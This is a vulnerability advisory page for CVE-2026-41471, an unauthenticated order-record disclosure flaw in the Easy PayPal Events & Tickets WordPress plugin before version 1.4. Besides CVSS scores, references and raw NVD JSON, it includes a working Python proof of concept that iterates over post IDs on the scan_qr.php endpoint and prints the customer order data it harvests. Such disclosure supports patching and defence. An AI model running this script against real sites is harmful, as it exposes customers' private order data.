CVE-2026-41471

Description

Easy PayPal Events & Tickets plugin for WordPress before version 1.4 contain an information disclosure vulnerability in the QR code scanning endpoint that allows unauthenticated attackers to enumerate and retrieve all customer order records. Attackers can iterate over sequential WordPress post IDs through the scan_qr.php endpoint to harvest the complete set of orders stored in the database without requiring authentication or prior knowledge of specific order identifiers.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Easy PayPal Events & Tickets < 1.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable endpoint
# Replace 'target.com' with the actual victim domain
target_url = "http://target.com/wp-content/plugins/easy-paypal-events-tickets/scan_qr.php"

print("Starting ID enumeration...")

# Iterate through sequential WordPress Post IDs
for post_id in range(1, 2000):
    # Construct payload
    params = {'id': post_id}
    
    try:
        response = requests.get(target_url, params=params, timeout=5)
        
        # Check if response indicates valid order data
        # Adjust condition based on actual response structure
        if response.status_code == 200 and len(response.text) > 0:
            # Filter out empty or non-order responses if necessary
            print(f"[+] Data found for ID {post_id}:")
            print(response.text)
            print("-" * 40)
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to server: {e}")
        break

print("Enumeration completed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41471
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41471
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41471/
[4] VulDB https://vuldb.com/cve/CVE-2026-41471
[5] https://gist.github.com/4lec4st/9fd04b4bfadb3f7e388f61588f5f2564
[6] https://wordpress.org/plugins/easy-paypal-events-tickets/#developers
[7] https://www.vulncheck.com/advisories/easy-paypal-events-tickets-information-disclosure-via-qr-code-endpoint

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41471", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:29.447", "lastModified": "2026-05-13T16:16:45.200", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Easy PayPal Events & Tickets plugin for WordPress before version 1.4 contain an information disclosure vulnerability in the QR code scanning endpoint that allows unauthenticated attackers to enumerate and retrieve all customer order records. Attackers can iterate over sequential WordPress post IDs through the scan_qr.php endpoint to harvest the complete set of orders stored in the database without requiring authentication or prior knowledge of specific order identifiers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://gist.github.com/4lec4st/9fd04b4bfadb3f7e388f61588f5f2564", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/easy-paypal-events-tickets/#developers", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/easy-paypal-events-tickets-information-disclosure-via-qr-code-endpoint", "source": "[email protected]"}]}}